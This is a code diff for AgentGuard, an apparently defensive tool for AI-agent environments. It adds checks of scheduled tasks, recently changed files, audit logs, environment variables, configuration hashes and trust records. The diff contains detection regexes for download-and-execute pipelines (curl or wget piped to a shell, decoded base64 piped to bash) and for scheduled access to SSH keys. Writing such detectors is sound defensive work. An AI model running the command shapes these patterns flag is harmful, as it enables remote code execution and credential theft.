+        findings.push(patrolFinding(4, 'HIGH', `AgentGuard-related scheduled task ${taskName} has a highest-privilege XML principal.`));
+      }
+    }
+    return findings;
+  }
+
+  const [userCron, timers, openClawCron] = await Promise.all([
+    runCommandText('crontab', ['-l']),
+    runCommandText('systemctl', ['list-timers', '--all', '--no-pager']),
+    runCommandText('openclaw', ['cron', 'list']),
+  ]);
+  const systemCron = readSystemCronText();
+  const systemdDefinitions = timers.available
+    ? await readSystemdTimerDefinitions(timers.output)
+    : { available: false, output: '' };
+  const available = userCron.available || timers.available || openClawCron.available || systemCron.available;
+  if (!available) return [patrolFinding(4, 'MEDIUM', 'Scheduled tasks could not be inspected with an available system collector.')];
+  const output = [userCron.output, timers.output, systemdDefinitions.output, openClawCron.output, systemCron.output].join('\n');
+  const findings: CheckupFinding[] = [];
+  if (hasScheduledDownloadAndExecute(output)) {
+    findings.push(patrolFinding(4, 'CRITICAL', 'A scheduled task contains a download-and-execute command pattern.'));
+  }
+  if (/[^\r\n]*(?:\.ssh|authorized_keys)[^\r\n]*/i.test(output)) {
+    findings.push(patrolFinding(4, 'HIGH', 'A scheduled task accesses SSH material.'));
+  }
+  const agentRootLines = output.split(/\r?\n/).filter((line) =>
+    touchesAgentRoot(line) && !/agentguard(?:\.cmd)?["']?\s+checkup\s+--json/i.test(line));
+  if (agentRootLines.length > 0) {
+    findings.push(patrolFinding(4, 'HIGH', 'An unknown scheduled job modifies or inspects a detected agent installation root.'));
+  }
+  if (/\[(?:unreadable scheduled-task source|systemd timer coverage truncated)/i.test(output)) {
+    findings.push(patrolFinding(4, 'MEDIUM', 'Scheduled-task coverage was incomplete because one or more system definitions could not be inspected.'));
+  }
+  return findings;
+}
+
+function hasScheduledDownloadAndExecute(text: string): boolean {
+  return /(curl\b[^\r\n]*\|\s*(?:bash|sh)|wget\b[^\r\n]*\|\s*(?:bash|sh)|base64\s+-d[^\r\n]*\|\s*bash|eval\s*["'(]*\$?\(?curl)/i.test(text);
+}
+
+function touchesAgentRoot(text: string): boolean {
+  return /(?:^|[\\/])\.(?:claude|codex|openclaw|qclaw|hermes|dsh)(?:[\\/]|\b)/i.test(text);
+}
+
+function readSystemCronText(): CommandTextResult {
+  const paths = ['/etc/crontab'];
+  try {
+    if (existsSync('/etc/cron.d')) {
+      for (const entry of readdirSync('/etc/cron.d', { withFileTypes: true })) {
+        if (entry.isFile()) paths.push(join('/etc/cron.d', entry.name));
+      }
+    }
+  } catch {
+    // Keep any readable system crontab paths collected so far.
+  }
+  let available = false;
+  const output: string[] = [];
+  for (const path of paths.slice(0, 100)) {
+    if (!existsSync(path)) continue;
+    available = true;
+    try {
+      const info = statSync(path);
+      if (info.isFile() && info.size <= 512 * 1024) output.push(readFileSync(path, 'utf8'));
+      else output.push(`[unreadable scheduled-task source: ${path}]`);
+    } catch {
+      output.push(`[unreadable scheduled-task source: ${path}]`);
+    }
+  }
+  return { available, output: output.join('\n') };
+}
+
+async function readSystemdTimerDefinitions(timerList: string): Promise<CommandTextResult> {
+  const timerNames = [...new Set(
+    [...timerList.matchAll(/\b([A-Za-z0-9@_.-]+\.timer)\b/g)].map((match) => match[1]),
+  )];
+  if (timerNames.length === 0) return { available: true, output: '' };
+  const selected = timerNames.slice(0, 32);
+  const timerResults = await Promise.all(selected.map((timer) => runCommandText('systemctl', ['cat', '--no-pager', timer])));
+  const output = timerResults.filter((result) => result.available).map((result) => result.output);
+  const serviceNames = new Set(selected.map((timer) => timer.replace(/\.timer$/, '.service')));
+  for (const result of timerResults) {
+    for (const match of result.output.matchAll(/^\s*Unit\s*=\s*([A-Za-z0-9@_.-]+\.service)\s*$/gmi)) {
+      serviceNames.add(match[1]);
+    }
+  }
+  const serviceResults = await Promise.all([...serviceNames].map((service) =>
+    runCommandText('systemctl', ['cat', '--no-pager', service])));
+  output.push(...serviceResults.filter((result) => result.available).map((result) => result.output));
+  if (timerResults.some((result) => !result.available) || serviceResults.some((result) => !result.available)) {
+    output.push('[unreadable scheduled-task source: systemd unit]');
+  }
+  if (timerNames.length > selected.length) output.push('[systemd timer coverage truncated]');
+  return { available: true, output: output.join('\n') };
+}
+
+async function checkRecentFilesystemChanges(collection: PatrolFileCollection, scanner: SkillScanner): Promise<CheckupFinding[]> {
+  const cutoff = Date.now() - 24 * 60 * 60 * 1000;
+  const findings: CheckupFinding[] = [];
+  const recentFiles = collection.files.filter((file) => file.mtimeMs >= cutoff);
+  let unreadable = 0;
+  const scannable = recentFiles.filter((file) => isSecurityRelevantPatrolFile(file.path)).flatMap((file) => {
+    const content = readPatrolFile(file);
+    if (!content && file.size > 0) {
+      unreadable += 1;
+      return [];
+    }
+    return [{
+      path: file.path,
+      relativePath: relative(homedir(), file.path),
+      content,
+      extension: extname(file.path),
+    }];
+  });
+  if (scannable.length > 0) {
+    const snapshot: DirectoryScanSnapshot = {
+      files: scannable,
+      coverage: {
+        discovered: scannable.length,
+        scanned: scannable.length,
+        skipped: unreadable + collection.traversalErrors + (collection.truncated ? 1 : 0),
+        skippedByReason: {
+          fileLimit: collection.truncated ? 1 : 0,
+          oversized: 0,
+          unreadable: unreadable + collection.traversalErrors,
+        },
+        complete: !collection.truncated && collection.traversalErrors === 0 && unreadable === 0,
+      },
+    };
+    try {
+      const result = await scanner.scan({
+        skill: {
+          id: 'agentguard-patrol-recent-files',
+          source: homedir(),
+          version_ref: 'current',
+          artifact_hash: 'sha256:patrol-recent-files',
+        },
+        payload: { type: 'dir', ref: homedir() },
+      }, snapshot);
+      if (result.risk_level !== 'low') {
+        const evidencePaths = [...new Set(result.evidence.map((evidence) => evidence.file))].slice(0, 5);
+        findings.push(patrolFinding(
+          5,
+          riskLevelToSeverity(result.risk_level),
+          `Recent-file scan found ${result.risk_tags.join(', ') || 'security-rule'} patterns${evidencePaths.length ? ` in ${evidencePaths.join(', ')}` : ''}.`,
+        ));
+      }
+    } catch {
+      findings.push(patrolFinding(5, 'HIGH', 'The complete security-rule scan of recently modified files could not finish.'));
+    }
+  }
+
+  const sensitivePaths = [
+    join(homedir(), '.openclaw', 'openclaw.json'),
+    join(homedir(), '.openclaw', 'devices', 'paired.json'),
+    join(homedir(), '.ssh', 'authorized_keys'),
+  ];
+  if (process.platform === 'win32') {
+    findings.push(...await checkWindowsAclExposure(sensitivePaths, 5));
+  } else {
+    for (const path of sensitivePaths) {
+      const mode = permissionMode(path);
+      if (mode !== null && mode > 0o600) {
+        findings.push(patrolFinding(5, 'MEDIUM', `${path} permissions are ${mode.toString(8)}; expected 600 or stricter.`));
+      }
+    }
+  }
+  if (process.platform !== 'win32') {
+    for (const file of recentFiles) {
+      if (!/[\\/]workspace(?:[\\/]|-)/i.test(file.path)) continue;
+      try {
+        if ((statSync(file.path).mode & 0o111) !== 0) {
+          findings.push(patrolFinding(5, 'MEDIUM', `A recently modified workspace file is executable: ${file.path}.`));
+        }
+      } catch {
+        continue;
+      }
+    }
+  }
+  if (collection.truncated || collection.traversalErrors > 0 || unreadable > 0) {
+    findings.push(patrolFinding(5, 'MEDIUM', 'Recent-file patrol coverage was incomplete because one or more files could not be enumerated or read within safety limits.'));
+  }
+  return findings;
+}
+
+function checkAuditLogSafety(auditPath: string): CheckupFinding[] {
+  if (!existsSync(auditPath)) {
+    return [patrolFinding(6, 'MEDIUM', 'No AgentGuard audit log is available for the previous 24 hours.')];
+  }
+  let lines: string[];
+  let truncated = false;
+  try {
+    const info = statSync(auditPath);
+    const maxBytes = 16 * 1024 * 1024;
+    const bytesToRead = Math.min(info.size, maxBytes);
+    const buffer = Buffer.alloc(bytesToRead);
+    const descriptor = openSync(auditPath, 'r');
+    let bytesRead = 0;
+    try {
+      bytesRead = readSync(descriptor, buffer, 0, bytesToRead, Math.max(0, info.size - bytesToRead));
+    } finally {
+      closeSync(descriptor);
+    }
+    truncated = info.size > maxBytes;
+    const raw = buffer.subarray(0, bytesRead).toString('utf8');
+    lines = raw.split(/\r?\n/).filter(Boolean);
+    if (truncated && lines.length > 0) lines.shift();
+  } catch {
+    return [patrolFinding(6, 'HIGH', 'The AgentGuard audit log could not be read.')];
+  }
+  const cutoff = Date.now() - 24 * 60 * 60 * 1000;
+  const denials = new Map<string, number>();
+  let sawCritical = false;
+  let sawExfiltration = false;
+  let sawPromptInjection = false;
+  let malformedEvents = 0;
+  for (const line of lines) {
+    try {
+      const parsed: unknown = JSON.parse(line);
+      if (!parsed || typeof parsed !== 'object' || Array.isArray(parsed)) {
+        malformedEvents += 1;
+        continue;
+      }
+      const event = parsed as Record<string, unknown>;
+      const timestamp = Date.parse(String(event.timestamp || ''));
+      if (!Number.isFinite(timestamp) || timestamp < cutoff) continue;
+      const runtimeEvent = event.event === 'runtime_action' || (
+        typeof event.actionId === 'string' && typeof event.actionType === 'string'
+      );
+      if (!runtimeEvent) continue;
+      const reasons = Array.isArray(event.reasons) ? event.reasons : [];
+      const tags = [
+        ...(Array.isArray(event.risk_tags) ? event.risk_tags.map(String) : []),
+        ...reasons.flatMap((reason) => reason && typeof reason === 'object'
+          ? [String((reason as Record<string, unknown>).code || '')]
+          : []),
+      ].filter(Boolean);
+      const actor = event.actor as { skill?: { id?: unknown } } | undefined;
+      const skillValue = event.sourceSkill || event.initiating_skill || actor?.skill?.id;
+      const skill = typeof skillValue === 'string' ? skillValue.trim() : '';
+      if ((event.decision === 'deny' || event.decision === 'block') && skill) {
+        denials.set(skill, (denials.get(skill) || 0) + 1);
+      }
+      if (String(event.risk_level || event.riskLevel).toLowerCase() === 'critical') sawCritical = true;
+      if (tags.some((tag) => tag === 'WEBHOOK_EXFIL' || tag === 'NET_EXFIL_UNRESTRICTED')) sawExfiltration = true;
+      if (tags.includes('PROMPT_INJECTION')) sawPromptInjection = true;
+    } catch {
+      malformedEvents += 1;
+      continue;
+    }
+  }
+  const findings: CheckupFinding[] = [];
+  for (const [skill, count] of denials) {
+    if (count >= 3) findings.push(patrolFinding(6, 'HIGH', `Skill ${skill} was denied ${count} times in the previous 24 hours.`));
+  }
+  if (sawCritical) findings.push(patrolFinding(6, 'CRITICAL', 'Critical-risk runtime activity was recorded in the previous 24 hours.'));
+  if (sawExfiltration) findings.push(patrolFinding(6, 'HIGH', 'Possible data-exfiltration activity was recorded in the previous 24 hours.'));
+  if (sawPromptInjection) findings.push(patrolFinding(6, 'CRITICAL', 'Prompt-injection activity was recorded in the previous 24 hours.'));
+  if (malformedEvents > 0) findings.push(patrolFinding(6, 'MEDIUM', `${malformedEvents} malformed audit event(s) could not be analyzed.`));
+  if (truncated) findings.push(patrolFinding(6, 'MEDIUM', 'Audit-log analysis was limited to the newest 16 MiB; older events within the 24-hour window may require log rotation or archival review.'));
+  return findings;
+}
+
+function checkEnvironmentConfiguration(config: AgentGuardConfig): CheckupFinding[] {
+  const findings: CheckupFinding[] = [];
+  const expectedCredentialVariables = new Set(['GOPLUS_API_KEY', 'GOPLUS_API_SECRET', 'AGENTGUARD_API_KEY']);
+  const sensitiveEnvNames = Object.keys(process.env)
+    .filter((name) => /API_KEY|SECRET|PASSWORD|TOKEN|PRIVATE|CREDENTIAL/i.test(name))
+    .filter((name) => !expectedCredentialVariables.has(name))
+    .slice(0, 8);
+  if (sensitiveEnvNames.length > 0) {
+    findings.push(patrolFinding(7, 'MEDIUM', `Sensitive environment variable names are present: ${sensitiveEnvNames.join(', ')}.`));
+  }
+  if (config.level === 'permissive') {
+    findings.push(patrolFinding(7, 'MEDIUM', 'Protection level is permissive; production agents should normally use balanced or strict.'));
+  }
+  findings.push(...checkConfigurationBaseline(join(homedir(), '.openclaw')));
+  return findings;
+}
+
+function checkConfigurationBaseline(root: string): CheckupFinding[] {
+  const baselinePath = join(root, '.config-baseline.sha256');
+  if (!existsSync(baselinePath)) return [];
+  let lines: string[];
+  try {
+    const info = statSync(baselinePath);
+    if (!info.isFile() || info.size > 512 * 1024) throw new Error('invalid baseline file');
+    lines = readFileSync(baselinePath, 'utf8').split(/\r?\n/).filter(Boolean);
+  } catch {
+    return [patrolFinding(7, 'HIGH', 'The OpenClaw configuration baseline could not be read safely.')];
+  }
+  const findings: CheckupFinding[] = [];
+  for (const line of lines.slice(0, 1000)) {
+    const match = line.match(/^([a-fA-F0-9]{64})\s+\*?(.+)$/);
+    if (!match) {
+      findings.push(patrolFinding(7, 'MEDIUM', 'The OpenClaw configuration baseline contains an invalid entry.'));
+      continue;
+    }
+    const candidate = resolve(root, match[2]);
+    if (candidate !== root && !candidate.startsWith(`${root}${sep}`)) {
+      findings.push(patrolFinding(7, 'HIGH', 'The OpenClaw configuration baseline references a path outside its agent root.'));
+      continue;
+    }
+    try {
+      const info = statSync(candidate);
+      if (!info.isFile() || info.size > 8 * 1024 * 1024) throw new Error('unsafe baseline target');
+      const actual = createHash('sha256').update(readFileSync(candidate)).digest('hex');
+      if (actual.toLowerCase() !== match[1].toLowerCase()) {
+        findings.push(patrolFinding(7, 'HIGH', `Configuration baseline mismatch: ${candidate}.`));
+      }
+    } catch {
+      findings.push(patrolFinding(7, 'HIGH', `Configuration baseline target could not be verified: ${candidate}.`));
+    }
+  }
+  if (lines.length > 1000) findings.push(patrolFinding(7, 'MEDIUM', 'Configuration baseline coverage exceeded the patrol safety limit.'));
+  return findings;
+}
+
+interface TrustRegistrySnapshot {
+  records: TrustRecord[];
+  invalidRecords: number;
+}
+
+function normalizeTrustRecords(value: unknown): TrustRegistrySnapshot {
+  if (!Array.isArray(value)) return { records: [], invalidRecords: 1 };
+  const records: TrustRecord[] = [];
+  let invalidRecords = 0;
+  for (const candidate of value) {
+    if (!isTrustRecord(candidate)) {
+      invalidRecords += 1;
+      continue;
+    }
+    records.push(candidate);
+  }
+  return { records, invalidRecords };
+}
+
+function isTrustRecord(value: unknown): value is TrustRecord {
+  if (!value || typeof value !== 'object' || Array.isArray(value)) return false;
+  const record = value as Record<string, unknown>;
+  const skill = record.skill;
+  const review = record.review;
+  const capabilities = record.capabilities;
+  const reviewedAt = review && typeof review === 'object' && !Array.isArray(review)
+    ? (review as Record<string, unknown>).reviewed_at
+    : undefined;
+  const validReviewedAt = typeof reviewedAt === 'string' && Number.isFinite(Date.parse(reviewedAt));
+  const validExpiresAt = record.expires_at === undefined || (
+    typeof record.expires_at === 'string' && Number.isFinite(Date.parse(record.expires_at))
+  );
+  return Boolean(
+    skill && typeof skill === 'object' && !Array.isArray(skill) &&
+    typeof (skill as Record<string, unknown>).id === 'string' &&
+    typeof (skill as Record<string, unknown>).source === 'string' &&
+    typeof (skill as Record<string, unknown>).artifact_hash === 'string' &&
+    review && typeof review === 'object' && !Array.isArray(review) &&
+    validReviewedAt &&
+    validExpiresAt &&
+    capabilities && typeof capabilities === 'object' && !Array.isArray(capabilities) &&
+    typeof (capabilities as Record<string, unknown>).exec === 'string' &&
+    Array.isArray((capabilities as Record<string, unknown>).network_allowlist) &&
+    (record.status === 'active' || record.status === 'revoked') &&
+    (record.trust_level === 'trusted' || record.trust_level === 'restricted' || record.trust_level === 'untrusted')
+  );
+}
+
+function checkTrustRegistryHealth(
+  records: TrustRecord[] | null,
+  invalidRecords: number,
+  installedSources: Set<string>,
+): CheckupFinding[] {
+  if (records === null) {
+    return [patrolFinding(8, 'HIGH', 'The trust registry could not be read.')];
+  }
+  const findings: CheckupFinding[] = [];
+  if (invalidRecords > 0) {
+    findings.push(patrolFinding(8, 'HIGH', `${invalidRecords} malformed trust-registry record(s) could not be evaluated.`));
+  }
+  const now = Date.now();
+  for (const record of records) {
+    if (record.status !== 'active') continue;
+    const label = record.skill.id || record.skill.source;
+    if (record.expires_at && Date.parse(record.expires_at) < now) {
+      findings.push(patrolFinding(8, 'HIGH', `Trust record for ${label} has expired.`));
+    }
+    const reviewedAt = Date.parse(record.review.reviewed_at || record.updated_at);
+    if (record.trust_level === 'trusted' && Number.isFinite(reviewedAt) && now - reviewedAt > 30 * 24 * 60 * 60 * 1000) {
+      findings.push(patrolFinding(8, 'MEDIUM', `Trust record for ${label} has not been reviewed in more than 30 days.`));
+    }
+    if (record.trust_level === 'untrusted' && installedSources.has(record.skill.source)) {
+      findings.push(patrolFinding(8, 'HIGH', `Installed artifact ${label} has an untrusted registry record.`));
+    }
+    if (record.trust_level !== 'untrusted' && record.capabilities.exec === 'allow' && record.capabilities.network_allowlist.includes('*')) {
+      findings.push(patrolFinding(8, 'HIGH', `Trust record for ${label} combines command execution with unrestricted network access.`));
+    }
+  }
+  return findings;
 }
 
 function checkRuntimeProtection(config: AgentGuardConfig, skillsScanned: number): CheckupDimension {
@@ -1463,13 +2172,12 @@ function checkRuntimeProtection(config: AgentGuardConfig, skillsScanned: number)
     }
   });
   if (hasHook) score += 40;
-  else findings.push({ severity: 'HIGH', text: 'No AgentGuard runtime hook was detected in known agent configuration files.' });
+  else findings.push(patrolFinding(7, 'HIGH', 'No AgentGuard runtime hook was detected in known agent configuration files.'));
 
   if (existsSync(config.auditPath)) score += 30;
-  else findings.push({ severity: 'MEDIUM', text: 'No AgentGuard audit log exists yet, so runtime threat history is unavailable.' });
 
   if (skillsScanned > 0) score += 30;
-  else findings.push({ severity: 'MEDIUM', text: 'No installed skills were scanned during this checkup.' });
+  else findings.push(patrolFinding(1, 'MEDIUM', 'No installed skills were scanned during this checkup.'));
 
   return {
     score: clampScore(score),
@@ -1488,7 +2196,7 @@ function checkWeb3Safety(skillDirs: string[]): CheckupDimension {
   const findings: CheckupFinding[] = [];
   let score = process.env.GOPLUS_API_KEY ? 100 : 70;
   if (!process.env.GOPLUS_API_KEY) {
-    findings.push({ severity: 'MEDIUM', text: 'Web3 usage detected but GOPLUS_API_KEY is not configured for transaction checks.' });
+    findings.push(patrolFinding(7, 'MEDIUM', 'Web3 usage detected but GOPLUS_API_KEY is not configured for transaction checks.'));
   }
   return {
     score,
@@ -1506,16 +2214,33 @@ function permissionMode(path: string): number | null {
   }
 }
 
-function runCommandText(command: string, args: string[]): Promise<string> {
+interface CommandTextResult {
+  available: boolean;
+  output: string;
+}
+
+async function firstAvailableCommand(commands: Array<[string, string[]]>): Promise<CommandTextResult> {
+  for (const [command, args] of commands) {
+    const result = await runCommandText(command, args);
+    if (result.available) return result;
+  }
+  return { available: false, output: '' };
+}
+
+function runCommandText(command: string, args: string[]): Promise<CommandTextResult> {
   return new Promise((resolvePromise) => {
     try {
-      const child = execFile(command, args, { timeout: 2000 }, (error, stdout, stderr) => {
-        if (error) resolvePromise('');
-        else resolvePromise(`${stdout || ''}${stderr || ''}`);
+      const child = execFile(command, args, { timeout: 3000, maxBuffer: 512 * 1024 }, (error, stdout, stderr) => {
+        const output = `${stdout || ''}${stderr || ''}`;
+        if (!error) return resolvePromise({ available: true, output });
+        const benignEmptyCrontab = command === 'crontab' && /no crontab/i.test(output);
+        return resolvePromise(benignEmptyCrontab
+          ? { available: true, output }
+          : { available: false, output });
       });
-      child.on('error', () => resolvePromise(''));
+      child.on('error', () => resolvePromise({ available: false, output: '' }));
     } catch {
-      resolvePromise('');
+      resolvePromise({ available: false, output: '' });
     }
   });
 }
@@ -1789,7 +2514,7 @@ function appendCheckupAudit(auditPath: string, report: HealthCheckupReport): voi
       event: 'checkup',
       composite_score: report.composite_score,
       tier: report.tier,
-      checks: 5,
+      checks: 8,
       findings: totalFindings,
       skills_scanned: report.skills_scanned,
       dsh_plugins_scanned: report.dsh_plugins_scanned,

--- a/src/dsh/plugin.ts
+++ b/src/dsh/plugin.ts
@@ -25,10 +25,10 @@ import {
 import { normalizeDshOwnerPolicies } from './owner-policy.js';
 import { AgentGuardCloudClient } from '../cloud/client.js';
 import {
-  inspectSystemThreatFeedCron,
+  inspectThreatFeedCron,
   installThreatFeedCron,
   removeThreatFeedCron,
-  type SystemThreatFeedCronStatus,
+  type ThreatFeedCronStatus,
   type ThreatFeedCronRemovalResult,
   validateCronExpression,
 } from '../feed/cron.js';
@@ -187,7 +187,7 @@ export type AgentGuardDshSubscribeToolResult = {
   cronName: string;
   cronExpression: string;
   selfCheck: boolean;
-  backend: 'system';
+  backend: 'system' | 'windows-task-scheduler';
   created: boolean;
   modelSummary: string;
 };
@@ -210,6 +210,7 @@ export type AgentGuardDshSubscriptionStatusToolArgs = Record<string, never>;
 
 export type AgentGuardDshSubscriptionStatusToolResult = {
   subscribed: boolean;
+  backend: 'system' | 'windows-task-scheduler';
   subscriptionId?: string;
   targetAgentId?: string;
   currentAgentIsTarget: boolean;
@@ -226,8 +227,8 @@ export interface AgentGuardDshSubscriptionStatusDependencies {
   agentGuardHome?: () => string;
   loadSubscription?: (home: string) => Promise<DshThreatFeedSubscription | null>;
   inspectCron?: (
-    options: { name: string },
-  ) => Promise<SystemThreatFeedCronStatus>;
+    options: { name: string; backend: 'auto'; agentHost: 'dsh'; agentGuardHome: string },
+  ) => Promise<ThreatFeedCronStatus>;
   listNotifications?: (
     options: { subscriptionId: string; agentId: string },
     home: string,
@@ -248,7 +249,7 @@ export interface AgentGuardDshUnsubscribeDependencies {
   loadSubscription?: (home: string) => Promise<DshThreatFeedSubscription | null>;
   removeCron?: (options: {
     name: string;
-    backend: 'system';
+    backend: 'auto';
     agentHost: 'dsh';
     agentGuardHome: string;
   }) => Promise<ThreatFeedCronRemovalResult[]>;
@@ -274,7 +275,7 @@ export function createAgentGuardDshSubscribeTool(
   return {
     name: 'agentguard_dsh_subscribe',
     description:
-      'Subscribe the current DSH session to AgentGuard threat intelligence using a persistent system cron poller. ' +
+      'Subscribe the current DSH session to AgentGuard threat intelligence using the platform local scheduler. ' +
       'By default this polls without automatically scanning local artifacts; set selfCheck to true to enable scheduled self-checks.',
     parameters: {
       type: 'object',
@@ -357,7 +358,7 @@ export function createAgentGuardDshSubscribeTool(
         cronExpression: input.cronExpression,
         quiet: input.selfCheck,
         force: input.force,
-        backend: 'system',
+        backend: 'auto',
         agentHost: 'dsh',
         agentGuardHome: home,
       });
@@ -397,7 +398,7 @@ export function createAgentGuardDshSubscribeTool(
           const removeCron = dependencies.removeCron ?? removeThreatFeedCron;
           await removeCron({
             name: cronResult.name,
-            backend: 'system',
+            backend: 'auto',
             agentHost: 'dsh',
             agentGuardHome: home,
           }).catch(() => undefined);
@@ -409,17 +410,23 @@ export function createAgentGuardDshSubscribeTool(
       const selfCheckState = input.selfCheck
         ? 'with automatic self-check enabled'
         : 'without automatic self-check';
+      const backend = cronResult.backend === 'windows-task-scheduler'
+        ? 'windows-task-scheduler'
+        : 'system';
+      const backendLabel = backend === 'windows-task-scheduler'
+        ? 'Windows Task Scheduler task'
+        : 'system cron';
       return {
         subscriptionId: subscription.subscriptionId,
         targetAgentId: subscription.agentId,
         cronName: subscription.cronName,
         cronExpression: subscription.cronExpression,
         selfCheck: subscription.selfCheck,
-        backend: 'system',
+        backend,
         created: cronResult.created,
         modelSummary:
           `AgentGuard threat-feed subscription ${state} for this DSH session. ` +
-          `The system cron runs every ${subscription.cronExpression} ${selfCheckState}.`,
+          `The ${backendLabel} runs every ${subscription.cronExpression} ${selfCheckState}.`,
       };
     },
   };
@@ -431,13 +438,14 @@ export function createAgentGuardDshSubscriptionStatusTool(
   return {
     name: 'agentguard_dsh_subscription_status',
     description:
-      'Report the current DSH threat-feed subscription, system cron state, target session, and queued notification count without exposing notification contents.',
+      'Report the current DSH threat-feed subscription, local scheduler state, target session, and queued notification count without exposing notification contents.',
     parameters: emptyToolParameters(),
     output: {
       schema: {
         type: 'object',
         properties: {
           subscribed: { type: 'boolean' },
+          backend: { type: 'string', enum: ['system', 'windows-task-scheduler'] },
           subscriptionId: { type: 'string' },
           targetAgentId: { type: 'string' },
           currentAgentIsTarget: { type: 'boolean' },
@@ -451,6 +459,7 @@ export function createAgentGuardDshSubscriptionStatusTool(
         },
         required: [
           'subscribed',
+          'backend',
           'currentAgentIsTarget',
           'cronInstalled',
           'pendingNotifications',
@@ -466,16 +475,23 @@ export function createAgentGuardDshSubscriptionStatusTool(
       const home = (dependencies.agentGuardHome ?? (() => getAgentGuardPaths().home))();
       const loadSubscription = dependencies.loadSubscription ?? loadDshThreatFeedSubscription;
       const subscription = await loadSubscription(home);
-      const inspectCron = dependencies.inspectCron ?? inspectSystemThreatFeedCron;
+      const inspectCron = dependencies.inspectCron ?? inspectThreatFeedCron;
       const cronStatus = await inspectCron({
         name: subscription?.cronName ?? DSH_THREAT_FEED_CRON_NAME,
+        backend: 'auto',
+        agentHost: 'dsh',
+        agentGuardHome: home,
       });
+      const cronLabel = cronStatus.backend === 'windows-task-scheduler'
+        ? 'Windows Task Scheduler task'
+        : 'system cron';
       if (cronStatus.error) {
-        throw new Error(`Could not inspect the AgentGuard system cron: ${cronStatus.error}`);
+        throw new Error(`Could not inspect the AgentGuard ${cronLabel}: ${cronStatus.error}`);
       }
       if (!subscription) {
         return {
           subscribed: false,
+          backend: cronStatus.backend,
           currentAgentIsTarget: false,
           cronInstalled: cronStatus.installed,
           pendingNotifications: 0,
@@ -497,6 +513,7 @@ export function createAgentGuardDshSubscriptionStatusTool(
       const queueSummary = queued.length === 1 ? '1 queued notification' : `${queued.length} queued notifications`;
       return {
         subscribed: true,
+        backend: cronStatus.backend,
         subscriptionId: subscription.subscriptionId,
         targetAgentId: subscription.agentId,
         currentAgentIsTarget,
@@ -508,7 +525,7 @@ export function createAgentGuardDshSubscriptionStatusTool(
         ...(latestQueuedAt ? { latestQueuedAt } : {}),
         modelSummary:
           `AgentGuard threat-feed subscription is saved for ${currentAgentIsTarget ? 'this' : 'another'} DSH session; `
-          + `system cron is ${cronStatus.installed ? 'installed' : 'absent'} with ${queueSummary}.`,
+          + `${cronLabel} is ${cronStatus.installed ? 'installed' : 'absent'} with ${queueSummary}.`,
       };
     },
   };
@@ -520,7 +537,7 @@ export function createAgentGuardDshUnsubscribeTool(
   return {
     name: 'agentguard_dsh_unsubscribe',
     description:
-      'Remove the current DSH session threat-feed subscription transactionally: system cron first, then exact queued notifications, then saved subscription state.',
+      'Remove the current DSH session threat-feed subscription transactionally: local scheduled task first, then exact queued notifications, then saved subscription state.',
     parameters: emptyToolParameters(),
     output: {
       schema: {
@@ -557,16 +574,20 @@ export function createAgentGuardDshUnsubscribeTool(
       const removeCron = dependencies.removeCron ?? removeThreatFeedCron;
       const cronResults = await removeCron({
         name: subscription.cronName,
-        backend: 'system',
+        backend: 'auto',
         agentHost: 'dsh',
         agentGuardHome: home,
       });
-      const cronResult = cronResults.find(result => result.backend === 'system');
+      const cronResult = cronResults.find(result =>
+        result.backend === 'system' || result.backend === 'windows-task-scheduler');
+      const cronLabel = cronResult?.backend === 'windows-task-scheduler'
+        ? 'Windows Task Scheduler task'
+        : 'system cron';
       if (!cronResult) {
-        throw new Error('Could not remove the AgentGuard system cron: removal result was unavailable.');
+        throw new Error(`Could not remove the AgentGuard ${cronLabel}: removal result was unavailable.`);
       }
       if (cronResult.error) {
-        throw new Error(`Could not remove the AgentGuard system cron: ${cronResult.error}`);
+        throw new Error(`Could not remove the AgentGuard ${cronLabel}: ${cronResult.error}`);
       }
 
       const listNotifications = dependencies.listNotifications ?? listDshThreatFeedNotifications;
@@ -587,7 +608,7 @@ export function createAgentGuardDshUnsubscribeTool(
         pendingNotificationsRemoved: noticeIds.length,
         modelSummary:
           `AgentGuard threat-feed subscription removed for this DSH session. `
-          + `${cronResult.removed ? 'Removed the system cron' : 'The system cron was already absent'} and ${queueSummary}.`,
+          + `${cronResult.removed ? `Removed the ${cronLabel}` : `The ${cronLabel} was already absent`} and ${queueSummary}.`,
       };
     },
   };

--- a/src/dsh/plugin.ts
+++ b/src/dsh/plugin.ts
@@ -304,7 +304,7 @@ export function createAgentGuardDshSubscribeTool(
           cronName: { type: 'string' },
           cronExpression: { type: 'string' },
           selfCheck: { type: 'boolean' },
-          backend: { type: 'string', enum: ['system'] },
+          backend: { type: 'string', enum: ['system', 'windows-task-scheduler'] },
           created: { type: 'boolean' },
           modelSummary: { type: 'string' },
         },

--- a/src/feed/cron.ts
+++ b/src/feed/cron.ts
@@ -1,14 +1,15 @@
 import { spawn } from 'node:child_process';
 import { createHash, createPrivateKey, createPublicKey, randomBytes, randomUUID, sign as signPayload } from 'node:crypto';
 import { existsSync, readFileSync } from 'node:fs';
-import { chmod, mkdir, rm, writeFile } from 'node:fs/promises';
+import { appendFile, chmod, mkdir, open, readdir, rename, rm, stat, writeFile } from 'node:fs/promises';
 import http from 'node:http';
 import net from 'node:net';
 import { homedir } from 'node:os';
-import { isAbsolute, join } from 'node:path';
+import { isAbsolute, join, win32 } from 'node:path';
+import { Cron } from 'croner';
 
-export type CronBackend = 'auto' | 'openclaw' | 'qclaw' | 'hermes' | 'system';
-export type ResolvedCronBackend = 'openclaw' | 'openclaw-gateway' | 'qclaw-gateway' | 'hermes' | 'system';
+export type CronBackend = 'auto' | 'openclaw' | 'qclaw' | 'hermes' | 'system' | 'windows';
+export type ResolvedCronBackend = 'openclaw' | 'openclaw-gateway' | 'qclaw-gateway' | 'hermes' | 'system' | 'windows-task-scheduler';
 export type CronAgentHost = 'claude-code' | 'codex' | 'openclaw' | 'hermes' | 'qclaw' | 'dsh';
 
 export interface OpenClawCronInstallResult {
@@ -35,6 +36,10 @@ export interface SystemThreatFeedCronStatus {
   error?: string;
 }
 
+export interface ThreatFeedCronStatus extends SystemThreatFeedCronStatus {
+  backend: 'system' | 'windows-task-scheduler';
+}
+
 export interface OpenClawGatewayOptions {
   host?: string;
   port?: number;
@@ -51,7 +56,17 @@ export interface CommandResult {
   stderr: string;
 }
 
-export type CommandRunner = (command: string, args: string[], input?: string) => Promise<CommandResult>;
+export interface CommandRunnerOptions {
+  env?: NodeJS.ProcessEnv;
+  timeoutMs?: number;
+}
+
+export type CommandRunner = (
+  command: string,
+  args: string[],
+  input?: string,
+  options?: CommandRunnerOptions,
+) => Promise<CommandResult>;
 
 interface OpenClawCronJob {
